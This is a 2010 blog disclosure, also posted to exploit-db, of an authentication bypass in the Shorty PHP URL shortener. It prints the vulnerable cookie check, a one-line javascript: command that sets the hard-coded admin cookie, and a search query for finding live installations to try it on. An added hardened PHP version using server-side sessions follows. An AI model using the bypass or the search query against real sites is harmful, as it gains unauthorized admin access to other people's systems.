Shorty Authentication Bypass

by on April 16, 2010
(This post was originally published on my personal blog and was also featured on the exploit-db.com website.)
Today, while reading around on the internet, I found an article about 7 PHP scripts for generating short URLs. These links are very common today, and there is a lot of controversy about the security risks they imply. I'm not here (for now) to discuss URL shortening services, but to talk about a stupid bug that I found in the first (!!!) piece of software that WebResourcesDepot recommends today.
Shorty is a very old script, from 2006. Why are they recommending it in the first place? Second: did they try to install it? A fresh install throws a lot of errors, and it takes some pain to fix them. Buggy from scratch.
I then decided to read some of the source code, and found a bug in functions.php that can be used to bypass the login form. Let's read some PHP code:
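// Gate for admin pages: stops the request unless the cookie matches.
function authenticate(){
    $cookie = @$_COOKIE['snickerdoodle'];
    // The only "proof" of login is a fixed string sent by the client.
    if($cookie == "polarbears"){
        //
    } else {
        exit("Not logged in.");
    }
}

// Same check, but returns 1 (logged in) or 0 instead of exiting.
function verify(){
    if(@$_COOKIE['snickerdoodle']){
        $cookie = $_COOKIE['snickerdoodle'];
    } else {
        $cookie = '';
    }
    if($cookie == "polarbears"){
        return 1;
    } else {
        return 0;
    }
}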
As you can see, this code uses a cookie named "snickerdoodle" with the value "polarbears" to determine whether you are authenticated. Both are constants hard-coded in the source, so anyone who has read the code can present that cookie without ever logging in. It's very easy to create a new cookie with this data in your browser using a Firefox extension. If you are using a browser without extensions, like Google Chrome, you can type the following JavaScript statement into the URL bar:
javascript:document.cookie="snickerdoodle=polarbears";
If you don't want to install Shorty (and mess around with all the hacks you have to do to use it), you can always use the search intitle:"Shorty (Beta)" to find some places to test it.
Have fun!
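For contrast with the cookie check in functions.php above, here is an added example (not code from Shorty or from the original post) of the same two functions backed by server-side session state, so the login flag never depends on a value the client can choose. The names ADMIN_PASSWORD_HASH, start_secure_session() and login() are hypothetical, and the code assumes PHP 7.3+ served over HTTPS.

```php
<?php
// Added example: hardened replacements for authenticate() and verify().
// ADMIN_PASSWORD_HASH, start_secure_session() and login() are hypothetical
// names introduced here; they are not part of Shorty.

// Assumption: generated once with password_hash() and stored in the config.
const ADMIN_PASSWORD_HASH = '<placeholder: output of password_hash()>';

function start_secure_session(): void {
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    // The cookie only carries a random session ID; the login flag itself
    // lives on the server in $_SESSION.
    session_set_cookie_params([
        'httponly' => true,     // not readable through document.cookie
        'secure'   => true,     // sent over HTTPS only
        'samesite' => 'Strict',
    ]);
    session_start();
}

function login(string $password): bool {
    start_secure_session();
    if (!password_verify($password, ADMIN_PASSWORD_HASH)) {
        return false;
    }
    session_regenerate_id(true);        // prevent session fixation
    $_SESSION['authenticated'] = true;  // server-side state only
    return true;
}

// Same contract as the original verify(): 1 if logged in, 0 otherwise.
function verify(): int {
    start_secure_session();
    return (($_SESSION['authenticated'] ?? false) === true) ? 1 : 0;
}

// Same contract as the original authenticate(): stop the request if not logged in.
function authenticate(): void {
    if (verify() !== 1) {
        http_response_code(403);
        exit("Not logged in.");
    }
}
```

With this layout a client that sets its own cookie value only supplies an unknown session ID, which maps to an empty session and fails verify().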